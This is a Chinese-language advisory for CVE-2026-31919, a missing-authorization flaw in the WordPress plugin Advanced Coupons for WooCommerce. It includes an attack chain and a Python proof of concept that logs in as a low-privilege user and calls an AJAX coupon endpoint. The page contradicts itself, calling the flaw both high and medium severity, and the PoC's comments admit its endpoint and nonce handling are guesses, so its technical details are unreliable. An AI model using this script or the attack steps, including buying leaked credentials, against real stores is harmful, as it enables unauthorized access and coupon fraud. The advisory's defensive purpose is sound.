CVE-2026-31919 Advanced Coupons for WooCommerce 缺失授权漏洞

漏洞信息

漏洞编号

CVE-2026-31919

漏洞类型

Missing Authorization（缺失授权/访问控制）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Advanced Coupons for WooCommerce (advanced-coupons-for-woocommerce-free)

漏洞概述

CVE-2026-31919是WordPress插件Advanced Coupons for WooCommerce中发现的一个高危安全漏洞。该漏洞属于缺失授权（Missing Authorization）类型，存在于插件的访问控制机制中，允许低权限用户（如订阅者角色）执行本应需要更高权限的操作。攻击者可利用此漏洞绕过正常的权限检查，访问或修改通常仅管理员或其他高权限用户才能访问的功能和数据。此漏洞影响插件版本从任意版本至4.7.1（含），已在2026年3月13日被披露。该漏洞由Patchstack安全团队发现并报告，CVSS评分为4.3，属于中等严重程度。虽然评分相对较低，但由于涉及访问控制缺陷，在实际环境中可能被组合利用以提升攻击效果。建议所有使用该插件的用户立即检查并更新至最新版本或采取相应的安全缓解措施。

技术细节

该漏洞源于Advanced Coupons for WooCommerce插件在处理用户请求时未能正确验证用户权限。插件的某些管理功能缺少适当的权限检查（capability check），导致经过认证的低权限用户可以调用本应仅限管理员使用的API端点或功能函数。具体而言，插件在处理优惠券相关操作（如创建、修改、删除优惠券）时，对用户身份和权限的验证不充分。攻击者可通过构造特定的HTTP请求，在请求中携带有效的认证cookie但使用低权限账户的会话，访问受保护的管理功能。这种缺陷使得攻击者可以枚举、查看甚至修改其他用户创建的优惠券数据，或利用优惠券功能进行进一步的攻击。由于WooCommerce优惠券系统通常与订单处理和支付流程集成，此类访问控制漏洞可能被用于欺诈交易或窃取敏感业务信息。

攻击链分析

STEP 1

1. 信息收集

攻击者首先识别目标网站使用的WordPress版本和是否安装了Advanced Coupons for WooCommerce插件，可通过robots.txt、HTML源码或Wappalyzer等工具获取信息

STEP 2

2. 账户获取

攻击者需要获取目标WordPress站点的低权限账户（如订阅者角色），可通过默认账户、社会工程学或从数据泄露库中获取已有凭证

STEP 3

3. 认证会话建立

使用获取的低权限账户登录WordPress，获取有效的会话cookie，建立已认证的HTTP会话

STEP 4

4. 未授权功能访问

利用缺失的授权检查，通过构造特定的HTTP请求访问本应需要管理员权限的优惠券管理API端点，如acfw_get_coupons等

STEP 5

5. 数据窃取或操作

成功绕过授权后，攻击者可以枚举、查看、修改或删除所有优惠券数据，可能获取商业敏感信息或利用优惠券进行欺诈交易

STEP 6

6. 权限提升（可选）

攻击者可能进一步利用获取的优惠券管理权限，结合其他漏洞或配置错误实现更高级别的权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-31919 PoC - Missing Authorization in Advanced Coupons for WooCommerce
# Target: WordPress site with advanced-coupons-for-woocommerce-free plugin <= 4.7.1

def check_vulnerability(target_url, username, password):
    """
    Check if the target is vulnerable to CVE-2026-31919
    """
    session = requests.Session()
    
    # Step 1: Login with low-privilege user (subscriber role)
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    login_response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed")
        return False
    
    print("[+] Logged in with low-privilege user")
    
    # Step 2: Try to access admin coupon management functionality
    # This endpoint should require admin privileges but doesn't check properly
    admin_coupon_url = f"{target_url}/wp-admin/admin.php?page=advanced-coupons"
    
    # Step 3: Try to create/modify coupons via AJAX API
    api_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Example: Attempt to list all coupons (should require admin)
    list_coupons_data = {
        'action': 'acfw_get_coupons',
        'nonce': 'dummy',  # May not be properly validated
    }
    
    api_response = session.post(api_url, data=list_coupons_data)
    
    # Step 4: Check if unauthorized access was successful
    if api_response.status_code == 200 and 'coupons' in api_response.text.lower():
        print("[!] VULNERABLE: Low-privilege user can access coupon management")
        print(f"[*] Response: {api_response.text[:500]}")
        return True
    else:
        print("[-] Target may not be vulnerable or different endpoint required")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2026-31919-poc.py <target_url> <username> <password>")
        print("Example: python cve-2026-31919-poc.py http://example.com subscriber password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    check_vulnerability(target, user, pwd)

影响范围

advanced-coupons-for-woocommerce-free <= 4.7.1

防御指南

临时缓解措施

在官方安全补丁发布之前，可采取以下临时缓解措施：1) 限制wp-admin目录访问，仅允许特定IP段访问管理后台；2) 禁用或限制XML-RPC和REST API的未授权访问；3) 监控并限制低权限用户对优惠券相关API的调用频率；4) 考虑暂时禁用Advanced Coupons插件，待官方发布修复版本后再启用；5) 加强对用户注册和账户管理的审核，防止攻击者获取低权限账户。